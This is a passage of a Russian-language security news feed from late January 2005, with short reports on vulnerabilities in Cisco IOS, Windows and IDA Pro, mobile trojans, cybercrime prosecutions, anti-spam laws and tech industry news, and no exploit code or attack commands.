получить новые цели и обновления, сообщает Internet Storm Center. Обследование серверов IRC показало 8500 подключенных хостов, что может указывать на то, что эти компьютеры заражены, хотя исследователи остерегаются давать количественные оценки. «Этот бот может использовать для своего распространения и другие механизмы, — говорит старший специалист секьюрити-фирмы LURHQ и участник анализа Internet Storm Center Джо Стюарт. — Мы не можем сказать наверняка, что все 8500 компьютеров заражены именно этим эксплойтом».
Подробности

28/01/2005 13:02 Новый мультимедийный сервис от Verizon Wireless
Сотовый оператор Verizon Wireless в скором времени должен начать предоставление нового сервиса на базе технологии передачи данных 3G EV-DO (Evolution-Data Optimized). Новый сервис будет носить название V CAST и сможет предоставлять пользователям возможность просматривать и скачивать аудио/видео контент, используя Windows Media. Запуск в эксплуатации состоится 1 февраля 2005 года. По словам одного из сотрудников Verizon Wireless пользователи, которые первыми смогли опробовать сервис, были поражены высоким качеством потокового видео. Доступ абонентов Verizon Wireless к содержимому сервиса V CAST будет осуществляться через он-лайн магазин, и его стоимость составит $15 в месяц. 1 февраля 2005 года абоненты Verizon Wireless смогут воспользоваться сервисом при помощи трех новый сотовых телефонов LG VX8000, Samsung SCH-a890 и CDM-8940 производимый компанией UTStarcom Personal Communications.
Mobile-Review.com

28/01/2005 12:01 Microsoft услиливает защиту в новом SQL Server 2005
Microsoft обнародовала некоторые подробности относительно некоторых изменений в новой версии SQL Server, запланированной на этот год. Нововведения коснулись анализаторов кода, двух утилит - Префикс и Префаст. Эти утилиты были разработаны в Microsoft для автоматической проверки на часто возникающие ошибки, такие как переполнение буфера. Префикс проверяет код на входе, а Префаст - после компиляции. "Эти новинки - часть стратегии помогающей разработчикам анализировать защищенность системы", заявил директор по безопасности продуктов Microsoft Детлеф Эчерт (Detlef Echert). Есть и другие защитные нововведения. В частности, будет включена поддержка более защищенных шифрованных протоколов, нежели в существующей версии. Также появится опция частичного шифрования таблицы (отдельных полей).
CyberSecurity.Ru

28/01/2005 11:58 Законодательная инициатива московской гордумы по борьбе со спамом будет отозвана из Госдумы
26 января депутаты Московской городской думы приняли постановление "Об отзыве из Государственной Думы Федерального Собрания Российской Федерации проекта Федерального закона "О внесении дополнений в некоторые законодательные акты Российской Федерации в части противодействия массовой рассылке сообщений электросвязи рекламного характера", cообщает Regions.ru. По словам депутата Степана Орлова, летом прошлого года депутаты Московской городской Думы выступили с законодательной инициативой о внесении дополнений в ряд федеральных законодательных актов по борьбе со спамом. В настоящее время в странах Европы и США уже действуют законы, противодействующие массовой рассылке сообщений электросвязи рекламного характера. В России не было таких законодательных актов, что и послужило причиной для разработки законодательной инициативы. Но, в связи с созданием рабочей группы Министерства информационных технологий и связи РФ и Комитета по информационной политике Государственной Думы РФ по доработке проекта Федерального закона "О внесении дополнений в некоторые законодательные акты Российской Федерации в части противодействия массовой рассылке сообщений электросвязи рекламного характера", предлагается отозвать законодательную инициативу Мосгордумы. Как отметил Степан Орлов, депутатам столичного парламента было предложено войти в состав рабочей группы и принять участие в разработке федерального закона.
Regions.Ru

28/01/2005 11:22 В США будет внедрена новая технология слежения
С 31 июля в США будет внедрена новая технология слежения, которая поможет ужесточить контроль за пересечением государственной границы с Мексикой и Канадой. Как сообщает compulenta.ru, Министерство внутренней безопасности США намерено выдавать иностранным туристам, прибывающим в страну пешком и на автомобилях, специальные устройства. Эти устройства будут содержать микрочипы с уникальным идентификационным кодом, с помощью которого в компьютерах министерства можно найти документы с именем владельца, страной его происхождения, датами прибытия и отъезда и биометрическими данными. Ожидается, что данная технология не только упростит контроль за прибытием и убытием иностранцев, но и поможет выявлять туристов с просроченными визами, а также ускорит проверочные мероприятия на контрольно-пропускных пунктах. Пограничники смогут на расстоянии сканировать чипы и автоматически получать всю необходимую информацию. Использование чипов является частью федеральной программы US-VISIT по сбору таких данных, как отпечатки пальцев и фотографии иностранных гостей. Программа, введенная год назад, была разработана среди прочих мер по защите национальной безопасности после террористической атаки 11 сентября 2001 года. На сегодняшний день из 17,5 млн. туристов, пропущенных по программе US-VISIT, 407 иностранцев арестованы или не допущены в США. Действует в США и еще одна программа, в соответствии с которой министерство внутренней безопасности экспериментирует с внедрением радиочастотных идентификационных чипов (RFID) в американские паспорта. Цель данного новшества - борьба с подделкой документов и кражами. Правительство рассчитывает, что примеру США последуют и другие страны. Правозащитники же опасаются, что использование RFID позволит правительству и корпорациям, которые начали использовать радиометки на товарах, вести за гражданами более масштабное наблюдение.
"Компьюлента"

28/01/2005 10:50 Host.sk закрывает аккаунты пользователей
Как сообщает один из наших посетителей, некогда популярный и бесплатный хостинг host.sk на днях закрыл существовавшие несколько лет домены 29a.host.sk, z0mbie.host.sk, lovingod.host.sk и другие. Все эти домены так или иначе были связаны с деятельностью существующих или бывших вирмэйкерских групп. Хотя больше всего удивляет закрытие сайта lovingod.host.sk, на котором было не было какой-либо информации о создании вирусов.
Источник

27/01/2005 17:34 Желающих порулить Рунетом становится все больше
Федеральное агентство по печати и массовым коммуникациям (Роспечать) пополнило и без того объемный список ведомств, выражающих опасение по поводу состояния дел в российском сегменте Сети. Агентство выступает за введение фильтров контента в российской части Интернета. Об этом заявил заместитель руководителя Роспечати Андрей Романченко на всероссийской конференции "Информационная безопасность России в условиях глобального информационного общества". "Государственная политика в вопросе контентной фильтрации интернета заключается в том, чтобы предоставить обществу и личности услугу по защите от вредного и незаконного контента", - считает Романченко. Он призвал другие органы исполнительной власти, законодателей и СМИ поддержать инициативу агентства, сообщает "Интерфакс". Неужели в России еще остались министерства, которые не поддержали "драконовские" инициативы в той или иной форме?!
"Интерфакс"

27/01/2005 14:44 Занятная утка о Microsoft
Довольно занятная статья под названием "Microsoft's AntiSpyware Tool Removes Internet Explorer" обнаружена Дмитрием Леоновым aka dl (bugtraq.ru) на сайте BBspot. :) Суть статьи сводится к тому, что, якобы, недавно выпущенная M$ утилита AntiSpyware опознаёт Internet Explorer в качетсве шпионского ПО и удаляет его. Как пишет сам Дмитрий в комментариях: "Я, конечно, понимаю, что всенародная любовь к MS вообще и к IE в частности просто не оставляет иных вариантов кроме безграничного доверия к начавшей шествие по блогам (ну да для них простительно, а вот крупным сайтам могу только посочувствовать) новости о том, что MS AntiSpyware опознает IE как spyware и удаляет его с компьютера. Одно только прошу - перед тем как в очередной раз присылать ссылку на эту утку, гляньте на саму статью, на "звучащие" имена, рекомендации в ее конце, соседние статьи, и после этого сами решайте". Вроде бы до 1 апреля ещё далеко...
"Новость"

27/01/2005 14:21 bugzilla.mozdev.org подвергся атаке
Пользователь с адресом sexymeluckyyou73@yahoo.com изменил статус всех зарегистрированных ошибок на RESOLVED FIXED, и добавил комментарий, "these bugs are not from me they where on there when i bought the computer.", сообщает linux.org.ru. Последствие акта вандализма уже устранены.
Подробности

27/01/2005 13:37 Intel обвиняет китайскую компанию в незаконном использовании ПО
Корпорация Intel подала исковое заявление против китайской компании Shenzhen Donjin Communication Tech, вменяя ей нелегальное применение в производстве защищенного копирайтом софта, сообщает агентство Reuters. Речь идет о ПО, которое используется в монтажных платах для управления сенсорными панелями в системах телефонной связи. По заявлениям представителей Intel, это первое исковое заявление о нарушении прав на интеллектуальную собственность, поданное корпорацией на территории КНР. Микропроцессорная индустрия США считает воровство интеллектуальной собственности в Китае основной проблемой. В ноябре 2004 года американские компании-производители микросхем обратились к правительству КНР с требованием усилить защиту копирайта и патентов, для того чтобы привлечь инвестиции в экономику страны со стороны иностранных и местных фирм.
"Компьюлента"

27/01/2005 12:51 Автору "Бластера" дадут три года тюрьмы
Прокуроры, представляющие интересы Соединенных Штатов в ходе судебного процесса по делу Джефри Ли Парсона (Jeffrey Lee Parson), автора изрядно нашумевшего в августе 2003 года червя Blaster, требуют дать молодому вредителю 37 месяцев тюремного заключения. Чтоб неповадно было. Максимальный срок заключения, предложенный представителями федеральной прокуратуры, было определен еще в прошлом году, когда Парсон, рисковавший, вообще-то, "разменять червонец", согласился написать чистосердечное признание в авторстве вредоносной программы, в обмен на существенное смягчение наказания: от 18 до 37 месяцев отсидки в федеральной тюрьме с перспективой досрочного освобождения. Адвокаты Парсона, в свою очередь, надеются, что их клиент просидит в тюрьме усиленного режима не более шести месяцев, после чего перейдет на отбытие 18-месячного срока в пенитенциарное заведение санаторного типа. Кроме того, вредителю могут дать еще три года испытательного срока, пишет The Register.
Internet.Ru

27/01/2005 12:27 Телефонные вирусы вошли в сцепление с автомобилем?
Антивирусные компании изучают сообщения о том, что компьютерные вирусы будто бы атакуют бортовые компьютеры автомобилей. В прошлые выходные московскую «Лабораторию Касперского» спросили, как дезинфицировать бортовые компьютеры нескольких моделей Lexus: LX470, LS430 и Landcruiser 100. Они якобы заразились через мобильный телефон. Некоторые вирусы для мобильных телефонов действительно уже существуют, например, Cabir и Skulls, которые распространяются через Bluetooth и заражают трубки с операционной системой Symbian. У многих машин Lexus есть система навигации, которая может соединяться с мобильным телефоном через интерфейс Bluetooth, позволяя делать звонки hands-free, и «Лаборатория Касперского» полагает, что технология Bluetooth могла использоваться для передачи вируса в бортовую систему GPS. Однако не известно, какую операционную систему Lexus применяет в своей навигационной системе. Компания пока не откликнулась на просьбу о комментариях. «Мы знаем, что автопроизводители применяют в своих бортовых компьютерах существующие операционные системы — взять, к примеру, соглашение между Fiat и Microsoft, — говорит глава антивирусной компании «Лаборатория Касперского» Евгений Касперский. — Если возможность заражения мобильных устройств наводит ужас, то что говорить об инфицированном бортовом компьютере». Дэвид Эмм, старший консультант «Лаборатории Касперского» по технологии, считает версию о заражении автомобилей через мобильный телефон правдоподобной. «Это определенно возможно, но на данном этапе такая возможность представляется чисто теоретический, — сказал Эмм. — Вопрос в том, подвержены ли бортовые компьютеры атакам со стороны устройств с операционной системой Symbian. Я подозреваю, что при помощи телефона это можно будет сделать». «Лаборатория Касперского» продолжает изучение сообщений. Гоночные машины «Формулы 1», до тех пор, пока двухсторонняя мобильная связь во время гонок не была запрещена, снабжались антивирусным ПО с целью предотвращения вирусных атак на бортовую операционную систему.
ZDNet

26/01/2005 20:53 Скрипт для обнаружения скрытых пользователей в phpBB
Довольно полезный скрипт выпущен Predrag Damnjanovic из Югославии. Скрипт на PHP предназначен для обнаружения скрытых пользователей, обладающих правами администратора форума в популярном ПО phpBB. Как пишет сам автор, скрипт будет полезен администраторам, форумы которых были взломаны в результате серии взломов, последовавших за объявлением о существовании уязвимостей в этом и подобных ему форумах. Взломщики могли оставить подобные эккаунты, найти которые вручную зачастую бывает довольно затруднительно ввиду их большого количества на форуме. Созданный Предрагом небольшой скрипт как раз и предназначен для автоматического выполнения подобной работы. Необходимо просто скопировать скрипт в phpBB-директорию и запустить. После удаления статуса администратора форума скрипт можно удалить.
Cкрипт

26/01/2005 16:44 В Thunderbird появилась защита от мошенников
В почтовом клиенте Mozilla Thunderbird появилась встроенная защита от сетевых мошенников (phisher), которые рассылают письма, якобы от IT-отделов банков и коммерческих фирм, содержащие предложение зайти по определенному (на первый взгляд - вполне приличному) адресу и заново ввести персональные данные, в том числе, пароли и номера кредитных карт. В своей текущей реализации защита Thunderbird срабатывает, если ссылка ведет на узел без DNS-имени (http://17.22.13.44:8080/foo.php) или целевой адрес не соответствует тексту ссылки. В будущем диапазон методов может быть расширен.
Более подробно

26/01/2005 15:38 Cisco заделала опасную дыру в операционной системе IOS
В операционной системе Internetwork Operating System (IOS), использующейся в качестве программной платформы для большинства коммутаторов и машрутизаторов Cisco, обнаружена опасная уязвимость. Как сообщается, дыра теоретически может использоваться злоумышленниками с целью организации DoS-атак на удаленные устройства, конфигурация которых предполагает поддержку служб Cisco ITS (IOS Telephony Service), Cisco CME (CallManager Express) или SRST (Survivable Remote Site Telephony). Сервисы ITS, CME и SRST позволяют управлять IP-телефонами при помощи протокола SCCP (Skinny Call Control Protocol). Отправив сформированный особым образом запрос на SCCP-порт целевого устройства, нападающий может спровоцировать его перезагрузку. Повторная отсылка вредоносных пакетов приведет к возникновению условий отказа в обслуживании. Брешь присутствует в модификациях Internetwork Operating System с индексами 12.1YD, 12.2T, 12.3 и 12.3T
Описание

26/01/2005 14:24 Apple выпустила патч к семи уязвимостям в Mac OS X
Во вторник Apple Computer выпустила патч, исправляющих 7 уязвимостей, найденных в программном обеспечении для операционной системы Mac OS X. Среди программ с устраненными ошибками Safari, Mail, ColorSync и четыре open-source приложения. Обновление доступно пользователям Mac OS X через системный update. Кроме того, Apple объявила о том, что изменяет схему оглавления своих бюллетеней, решив нумеровать их последовательно для каждого года (аналогично делает Microsoft).
Nixp.Ru

26/01/2005 13:55 Введен в строй проект OpenSolaris.org
В прошлом году Sun Microsystems проводил массированный PR по поводу полного открытия исходников Solaris 10, не проходило недели, чтобы в прессе не появлялись новые подробности от Sun. Наконец, на прошлой неделе свет в конце туннеля стал различим, было заявлено о планах по открытию исходных текстов системы динамической отладки процессов (для выявления причин проблемы и мониторинга) DTrace. И вот, вчера, Sun официально объявил об открытии сайта OpenSolaris.org, с которого уже можно скачать код DTrace, сообщает opennet.ru. В дальнейшем, запланировано открытие исходных текстов других подсистем Solaris 10, включая код всей системы.
Сайт

26/01/2005 13:48 "Прослушка" компьютера
Специалисты компаний 3ami и BridgeHead Software совместно разработали систему Monitoring, Auditing & Security (MAS), сохраняющую информацию обо всех действиях, совершенных пользователем на компьютере - нажатиях на клавиши, операциях с мышью, с программами, с документами. Сохраняются "снимки" открывавшихся приложений. 3ami - автор модуля мониторинга и консоли управления MAS, Bridgehead - разработчик компонента, отвечающего за управление хранением. Перехваченные данные можно сохранять на диск в реальном времени или, из буфера в памяти, на ежедневной основе; по сообщению разработчиков, в среднем потребности в хранении для одного ПК составят около 16,4 Мбайт в месяц. Административная консоль системы позволяет производить поиск по сохраненным данным или вывести информацию за определенный период времени.
"Открытые системы"

26/01/2005 13:16 В Шотландии задержан организатор DDoS-атак
Британская полиция задержала 27-летнего жителя шотландского города Элджин, подозреваемого в подготовке DDoS-атак, сообщает сайт BBC News. Арест шотландца стал результатом спецоперации «Каспер», в которой принияли участие сотрудники национального подразделения по борьбе с преступлениями в сфере высоких технологий при шотландском агентстве по борьбе с незаконным оборотом наркотиков (SDEA). «В последние годы мы зафиксировали значительный рост DDoS-атак, часть из которых становится основой для онлайн-вымогательств», — прокомментировал ситуацию пресс-секретарь SDEA. По словам представителя руководства SDEA Стивена Уорда (Stephen Ward), операция «Каспер» проходила при тесном сотрудничестве с Секретной службой США.
Источник

26/01/2005 12:44 Symantec выпустила продвинутые антиспамерские устройства
Symantec представила два спам-фильтра и оптимизатор трафика, использующие технологии двух недавно приобретенных компаний — Brightmail и TurnTide. Устройства 8100 и 8200 — аппаратно-программные комплексы. 8200 на базе технологии Brightmail, — стандартный защитный шлюз, выпущенный в двух вариантах. 8100 — устройство оптимизации почтового трафика. Технология от TurnTide позволяет проверить «репутацию» сервера отправителя перед тем, как направить письмо дальше. Информация о надежности сервера берется из службы репутации Symantec (Reputation Service) на базе сервиса Brightmail. Например, если письмо поступило с IP-адреса, с которого рассылался спам, то приоритет его доставки понижается. «Очередь сообщений растет и в итоге спам, находящийся в её хвосте, удаляется», — объяснил работу системы менеджер по продуктам Symantec Дэниел Фримен (Daniel Freeman). Аналогичная технология уже используется конкурентами — IronPort, CipherTrust и Mirapoint, хотя их продукты в основном блокируют трафик со спамерских IP вместо ускорения доставки с надежных. По утверждению разработчиков, после установки их решения объем почты снижается вдвое за счёт уничтожения спама. Symantec предлагает 8100 и 8200 как комплект — первый принимает трафик, а второй (вместо него можно использовать и устройства других поставщиков) является почтовым шлюзом, который обеспечивает масштабируемость. Как утверждает г-н Фримен, устройства Symantec работают не на уровне почтового протокола SMTP, а ниже — на уровне TCP/IP трафика. Устройства защищают сервер от «словарных атак» — подбора имен почтовых ящиков по словарю. В них интегрирована поддержка трех антиспамерских технологий — LDAP, Transport Layer Security и Sender Policy Framework, но не Sender ID.
CNews

26/01/2005 11:59 GeCad: "заплата" для Windows нуждается в "заплате"
Специалисты румынской антивирусной компании GeCad предупредили о ненадежности систем Microsoft Windows с установленным последним обновлением MS05–01. По их словам, выпущенный патч не устраняет опасную уязвимость. Обновленная Windows по-прежнему позволяет злоумышленникам атаковать компьютер при помощи уязвимости в ActiveX-компоненте HTML Help. Как утверждают в GeCad, «дыра» дает возможность выполнять произвольный код в системе. Атакам подвержены Windows XP SP1, Windows 2000 SP4, но не Windows XP SP2. В Microsoft настаивают, что в январском обновлении предыдущие узявимости были устранены, а обнаруженная уязвимость — новая. Дата выхода пакета, устраняющего её, пока неизвестна. Возможно, она выйдет раньше февральского обновления. В 2003 году антивирусное подразделение GeCad было куплена Microsoft. После этого GeCad осталась на рынке и занимается консалтингом и исследованиями в области информационной безопасности.
Описание уязвимости

26/01/2005 11:49 Open Source видеокарта?
Проект под названием Open Graphics Project создает видеокарту с полностью открытыми спецификациями, BIOS'ом и т.п, сообщает linux.org.ru. Карту обещают выпустить в июне 2005. Обещаются:
- Полная поддержка OpenGL v1.3 + некоторые расширения 1.4
- Dual-link DVI, analog VGA, and TV out
- Поддержка сверхвысоких разрешений (>2048x2048)
- Пропускная способность памяти 1.6 млрд пикселей в секунду
- 128Mb памяти
и еще много всего.
Интервью с разработчиком

26/01/2005 11:27 Rambus опять судится
Возобновив судебную баталию, Rambus подала новые иски по поводу патентов, относящихся к DDR2 DRAM, но это только начало. Во вторник разработчик микросхем из Лос-Альтоса, штат Калифорния, объявил о подаче судебных исков против Hynix Semiconductor, тайваньской Nanya Technology и Infineon Technologies, а также против совместного предприятия последних двух компаний Inotera Memories за нарушение прав интеллектуальной собственности при производстве элементов памяти DDR2 DRAM, которые начали применяться в ПК в прошлом году. В иске, поданном в окружной суд северного округа Калифорнии, утверждается, что память GDDR2 и GDDR3, применяемая в графических платах, тоже нарушает патенты Rambus. Вероятно, что этот иск приведет руководителей компаний в трепет. Rambus уже судится с Infineon, Hynix и Micron, утверждая, что производимые этими компаниями элементы DDR DRAM — наиболее распространенный тип памяти для ПК в последние несколько лет — нарушают ее интеллектуальную собственность. Компании, в свою очередь, подали контр-иски, в которых заявляют, что патенты Rambus недействительны и были получены обманным путем. Другие компании, такие как Samsung, согласились выплатить Rambus роялти за DDR DRAM при условии, что суд не объявит патенты недействительными. Потерпев в начале процесса ряд неудач, Rambus одержала несколько побед в суде против Infineon и Hynix. Аналитики считают, что если патенты выстоят, то Rambus может рассчитывать на миллиардные роялти и лицензионные отчисления.
ZDNet

26/01/2005 10:45 Google наняла на работу ведущего разработчика Firefox
Компания Google пригласила на работу ведущего разработчика "свободного" браузера Mozilla Firefox 24-летнего Бена Гуджера (Ben Goodger), сообщает издание eWeek.com. Как известно, браузер Firefox призван составить конкуренцию доминировавшему в последние годы на рынке браузеру Microsoft Internet Explorer (IE). По последним исследованиям, IE, ранее занимавший около 98 процентов рынка, оттеснен за порог в 90 процентов, а стартовавший "с нуля" Firefox к настоящему времени уже преодолел 5-процентный барьер. В минувший понедельник промо-сайт нового браузера Spread Firefox отпраздновал скачивание 20-миллионной копии первой официальной версии браузера, вышедшей 9 ноября 2004 года. Google с самого начала поддерживает коллектив разработчиков Firefox - Mozilla Foundation. В частности, для пользователей этого браузера поисковая компания создала специальную точку входа на свой сайт, выполненную в стиле Firefox. Google взяла Гуджера на работу на полную ставку, однако половину своего рабочего времени он по-прежнему будет уделять работе в Mozilla - таким образом, Google сделала "пожертвование" на дальнейшую разработку главного продукта Mozilla.
Lenta.Ru

26/01/2005 10:24 Microsoft намерена ввести проверку подлинности Windows при скачивании обновлений
Компания Microsoft к середине текущего года намерена ввести систему проверки подлинности копий ОС Windows при работе с сайтом Windows Update. Как известно, с помощью этого сайта пользователи систем от Microsoft получают обновления компонентов ОС и "заплатки" для обнаруженных уязвимых мест в системе безопасности. В настоящее время пользователи с версиями Windows младше XP могут свободно загружать обновления с сайта Microsoft, при этом не проводится никаких проверок подлинности. Таким образом, через сайт успешно обновляются пиратские копии систем, что позволяет их владельцам обеспечивать безопасность своих компьютеров. Как известно, компьютер становится уязвимым, если в системе присутствует "дыра", найденная после выпуска ОС. "Дыры", как правило, позволяют злоумышленникам получить контроль над уязвимым компьютером, обратившись к нему через Интернет с помощью особым образом составленных запросов или прислав письмо с вредоносной программой. Как отмечает агентство Associated press, многие эксперты уже выразили опасения, что новая политика Microsoft может нанести удар по стабильности Интернета в целом, так как пиратские копии Windows стоят на огромном числе компьютеров мира. Руководитель рабочей группы Microsoft по введению системы авторизации Дэвид Лазар (David Lazar) в ответ заявляет, что в компании будут внимательно рассматривать эту проблему, однако в целом позиция корпорации состоит в том, что новая политика, наоборот, призвана оздоровить информационную обстановку, так как пиратские копии Windows, по его словам, сами часто содержат вирусы и имеют другие проблемы с обеспечением безопасности. Тем не менее, по информации агентства, Microsoft может все же оставить за пользователями копий, подлинность которых не проверена, право загружать наиболее критичные обновления.
Подробности

25/01/2005 13:28 FreeBSD 4.11 доступна для скачивания через FTP
Несмотря на то, что официального анонса о выходе новой версии популярной ОС FreeBSD 4.11 ещё не было, на FTP-серверах команды разработчиков появились ISO-образы этой ОС.
ISO-образы

25/01/2005 13:14 Недельный отчет о вирусах Panda Software
Компания Panda Software выпустила очередной еженедельный отчёт о вирусной активности прошедшей недели. В отчете рассматриваются три червя: Bropia.A, Zar.A , Mydoom.AE и файл Gaobot.batch
Отчёт

25/01/2005 12:58 Москва приютит хакера всех времен и народов
10 февраля 2005 г. в столичном отеле Radisson-Славянская состоится выступление Кевина Митника, посвященное методам социальной инженерии и их использованию злоумышленниками с целью похитить ценную интеллектуальную собственность либо разрушить важные данные. В прошлом самый известный хакер мира, а ныне - президент компании Mitnick Security Consulting, консультирующий государственные структуры и крупнейшие компании по вопросам защиты корпоративных систем и сетей, г-н Митник сделает пленарный доклад на конференции "Информационная безопасность предприятия: как противостоять новым угрозам?", которую проводят компании IDC и "Открытые системы". На конкретных примерах Кевин Митник объяснит, почему пользующиеся неоправданно высоким доверием технологии безопасности - межсетевые экраны, устройства идентификации, средства шифрования или системы обнаружения сетевых атак, оказываются малоэффективны в противостоянии социоинженерам. В ходе его презентации будут даны рекомендации, следование которым позволит организациям разработать и принять на вооружение результативную наступательную стратегию в области информационной безопасности, повысить уровень осведомленности сотрудников, а также заставит их изменить свое отношение к данной проблеме, перестроить собственное мышление и придерживаться единых корпоративных правил в области защиты конфиденциальных данных.
О конференции

25/01/2005 12:34 Уязвимости во многих сетевых продуктах
В вышедшем на днях бюллетене нашего соотечественника 3APA3A описывается наличие уязвимости во многих сетевых продуктов. Уязвимость связана с возможностью переполнения индекса битового массива структуры fd_set. Отсутствие контроля над большим количеством одновременно открытых сокетов или файловых дискрипторов (FD_SETSIZE) приводит к возможности записи за границы массива. Подобная уязвимость обсуждалась ещё в 2002 г. при описании аналогичной уязвимости в ОС NetBSD, однако тогда утверждалось, что она имеет локальный характер и не может быть использована удалённо. Как выяснил автор, возможность удалённой атаки существует, если автор(ы) исходного кода не проверяют номер сокета до использвания функции select() или макроса fd_set. При этом возникает (как указывалось выше) вероятность записи за границами выделяемого массива памяти. При этом возникает ситуация DoS, без возможности выполнения произвольного кода. В число уязвимых (вернее, проверенных) приложений попали: gnugk, jabber, BNC, socks5, Citadel, Dante, rinetd, bld, 3Proxy.
Подробное описание

25/01/2005 11:59 Уязвимость в IDA Pro
iDEFENSE cообщает об обнаружении уязвимости в популярном дизассемблере IDA Pro, выпускаемом DataRescue Inc. для платформ Windows и Linux и предназначенном для анализа откомпилированных файлов (а также внесения в них изменений). Уязвимость связана с механизмом разбора имён импортируемых бибилиотек PE (Portable Executable) файлов. Импортируемые данные накапливаются в массиве структур данных, при этом каждая структура данных содержит имя импортируемой библиотеки и список указателей функций, известный как Import Address Table. При разборе чрезмерно длинного имени импортируемой библиотеки возможна ситуация переполнения буфера в стеке (файл ida.wll, процедура "ida_835"). При этом возникает возможность выполнения произвольного кода с привилегиями пользователя, который в этот момент усердно корпит над анализом кода. Разумеется, для проведения подобной атаки необходимо убедить пользователя IDA Pro открыть специальным образом оформленный PE-файл. iDEFENSE подчёркивает, что уязвимость может присутствовать в других программах, предназначенных для анализа PE-файлов (например, PEiD). Уязвимость подтверждена в версиях 4.6 Service Pack 1 и 4.7 для обоих платформ. Разработчиком выпущен патч, который настоятельно рекомендуется всем скачать.
Описание
Патч

25/01/2005 11:06 Англоязычная версия сайта команды K-OTik
Известная французская гуппа K-OTik сообщила о запуске англоязычной версии своего сайта (раньше он был только на французском языке). Об этом проинформировал секьюрити-общественность в списке рассылки Bugtraq Gilles Fabienni. Новости по безопасности сайта доступны через Web, электронную почту (список рассылки) и RSS.
Сайт
Cписок рассылки
RSS/XML

25/01/2005 10:58 Ющенко зарегистрировал свое имя в домене .UA
Новоизбранный президент Украины Виктор Ющенко зарегистрировал доменное имя второго уровня yuschenko.ua. По данным сервиса whois (база данных, содержащая информацию о публичных доменах в зоне .UA), доменное имя yuschenko.ua было зарегистрировано 19 января, на основании свидетельства №34748 от 15 сентября 2003 г., подтверждающего права Виктора Ющенко на одноименный знак для товаров и услуг. Сейчас адрес yuschenko.ua используется как альтернатива ранее зарегистрированному yuschenko.com.ua, по которому находится персональный сайт Виктора Ющенко. Согласно правилам домена .UA, администратором которого является ООО "Хостмастер", доменное имя второго уровня (имя.ua) можно зарегистрировать только при наличии свидетельства о регистрации соответствующего знака для товаров и услуг (торговой марки).
Источник

25/01/2005 10:34 GPRS набирает популярность
Всё больше россиян начинают пользоваться услугами мобильного доступа в интернет, причем основная масса пользователей выбирает технологию GPRS. Согласно статистическим данным, 4,6 млн. абонентов регулярно выходят в Сеть посредством инфраструктуры передачи данных в GSM-сетях. При этом они составляют всего 6,2% абонентской базы. Как отмечают в аналитической компании iKS-Consulting, за прошедший год число пользователей сервисов пакетной передачи данных GPRS в российских сотовых сетях выросло в 12 раз, и по состоянию на конец декабря 2004 года составило 4,6 млн. человек. По мнению аналитиков, основными факторами роста количества GPRS-пользователей в России являются рост количества WAP-ресурсов и развитие рынка контент-услуг. «В настоящее время только в российском сегменте интернета насчитывается более 600 различных WAP-сайтов. Не случайно львиная доля (более 90%) GPRS-подписчиков использует WAP-over-GPRS», — отмечает Оксана Панкратова, аналитик iKS-Consulting. Запуск GPRS-сетей в регионах России как федеральными, так и региональными операторами сотовой связи, развитие GPRS-роуминга и увеличение числа телефонов с поддержкой технологии беспроводной пакетной передачи данных также стимулируют прирост числа пользователей. Как отмечает г-жа Панкратова, по оценкам экспертов, доля GPRS-терминалов в общем количестве мобильных телефонов в нашей стране, составляет около 45%. Наибольшее число пользователей GPRS в России приходится на сеть «Би Лайн» — количество абонентов, подключенных на пакет GPRS-услуг, по состоянию на конец 2004 года составило около 2 млн. человек. Количество GPRS-пользователей в сети «МегаФон» превысило 1,4 млн. человек, в сети МТС — 1,1 млн. абонентов.
CNews

25/01/2005 10:11 Microsoft согласилась выпустить версию Windows без медиаплеера
Корпорация Microsoft не будет подавать новую апелляцию на решение Европейской комиссии, обязавшей софтверного гиганта выпустить "урезанную" версию операционной системы Windows с исключенным из ее состава медиаплеером. Наличие приложения Windows Media Player в стандартной поставке ОС послужило основным поводом для антимонопольного разбирательства против Microsoft в Европейском союзе. Летом Microsoft подала апелляцию на решение Европейской комиссии, которая, впрочем, была отклонена. В итоге теперь, как сообщает Associated Press, софтверный гигант принял решение все же выпустить версию Windows без медиаплеера для европейских стран. Дистрибутив "облегченной" ОС должен поступить в продажу в течение ближайших недель, причем стоить он будет столько же, сколько и обычная Windows. Кроме того, представители корпорации отметили, что в интернете уже появился специальный веб-сайт, на котором производители серверного ПО могут ознакомиться с условиями лицензирования исходного кода серверных продуктов Microsoft.
Подробности

25/01/2005 09:51 Юрий Лужков: "Интернет серьезно болен"
Московский губернатор Юрий Лужков в понедельник, выступая на церемонии награждения лауреатов премии Москвы в области журналистики, заявил, что в настоящее время, по его мнению, "необходимо повышать ответственность за размещение информации во всемирной сети Интернет", передает агентство "Интерфакс". Вместе с тем, по его словам, регламентировать работу Интернета необходимо не за счет ограничения свободы, а за счет повышения ответственности. Лужков высказал также мнение, что в настоящее время "Интернет серьезно болен", следствием чего, по его оценке, является публикация в Сети материалов, пропагандирующих наркоманию и насилие. По информации издания "ГАЗЕТА.GZT.RU", он напомнил, что уже выступал в печати со статьями, в которых призывал общественность обратить внимание на проблемы "размещения негативной информации в Интернете", и отметил, что его призывы "пока не нашли серьезного отклика".
Lenta.Ru

24/01/2005 20:41 Эксплоит уязвимости MS05-002
houseofdabus опубликовал универсальный PoC код, эксплуатирующий переполнение буфера при обработке ANI файлов в Microsoft Internet Explorer в различных версиях MS Windows. Удаленный пользователь может выполнить произвольный код на уязвимой системе. ОС: Windows XP SP0-SP1, Windows 2000 SP2-SP4, Windows Server 2003.
Исходный код

24/01/2005 15:36 Троян Gavno не дает мобильникам звонить
Специалист в области защиты мобильных устройств Сим Воркс (Sim Works) обнаружил троянскую программу Gavno - первый код, лишающий сотовые телефоны возможности передавать и принимать звонки, сообщает Cellular News. В настоящее время зафиксированы 2 версии трояна. Обе заражают мобильники на Symbian, маскируются под патчи и полностью нарушают работу ОС. Gavno.a распространяется в виде файла patch.sis. Размер вредоносного файла – всего 2 КБ. Gavno.b имеет название patch_v2.sis, его размер несколько больше и он загружается вместе с троянскими программами Cabir и Camtimer. Через инфицированный мобильник Cabir рассылает все три вредоносных кода, используя Bluetooth. Gavno поражает такие устройства на платформе серии 60 под управлением ОС Symbian 7.0, как Nokia 6600 и 7610. Он не инфицирует Symbian-мобильники с оболочкой UIQ, в том числе SonyEricsson P900/910 и Motorola A925/1000, а также устройства на платформе серии 60 на Symbian 6.x, включая Nokia 3650 и Siemens SX1.
CNews

24/01/2005 15:19 Microsoft готовит привораживающий Elixir
